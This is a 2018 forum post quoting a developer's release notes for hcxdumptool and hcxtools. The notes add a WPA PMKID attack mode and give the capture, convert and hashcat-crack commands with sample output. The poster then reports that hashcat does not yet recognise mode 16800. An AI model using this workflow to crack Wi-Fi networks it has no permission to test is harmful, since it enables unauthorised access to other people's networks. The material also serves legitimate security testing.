07-25-2018, 10:40 PM
(This post was last modified: 07-25-2018, 11:30 PM by strike1953.)
(07-25-2018, 08:44 PM)ZerBea Wrote: Small update on hcxdumptool and hcxtools: moved to v 4.2.0 rc1:
Added complete new WPA attackmode according to new hashcat hashmodes 16800 and 16801. The attack is performed on the RSN IE (Robust Security Network Information Element) of an EAPOL 1/4 frame.
At this moment we do not know on which vendors and on how many routers this will work. Please test it...
Also hcxdumptool isn't ready for a 100% attack - I'm working on it.
$ hcxpcaptool -h
-z <file> : output PMKID file (hashcat hashmode -m 16800)
-Z <file> : output PMKID file (hashcat hashmode -m 16801)
Advantage:
only 2 packets required
1 associationrequest/reassociationrequest (proberesponse is ok, too)
2 EAPOL 1/4 (M1) with included RSN IE
Remember ap-less attack:
only 2 packets required
1 associationrequest/reassociationrequest (proberequest is ok, too)
2 EAPOL 2/4 (M2) as response to hcxdumptool
Just use hcxdumptool to capture, hcxpcaptool to convert and hashcat to crack
hcxtools update: 4.2.0 rc1
added new attack mode on WPA PMKID
$ hcxpcaptool -z hashfile.16800 pmkidassociationrequest.pcapng
start reading from pmkidassociationrequest.pcapng
summary:
file name....................: pmkidassociationrequest.pcapng
file type....................: pcapng 1.0
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 3
skipped packets..............: 0
packets with FCS.............: 0
association requests.........: 1
association responses........: 1
EAPOL packets................: 1
EAPOL PMKIDs.................: 1
1 PMKID(s) written to hashfile.16800
$ hashcat -m 16800 hashfile.16800 wordlist
example hashes are here:
https://hashcat.net/wiki/doku.php?id=example_hashes
Hashcat -m 16800?????? where?
Unknown hash-type '16800' selected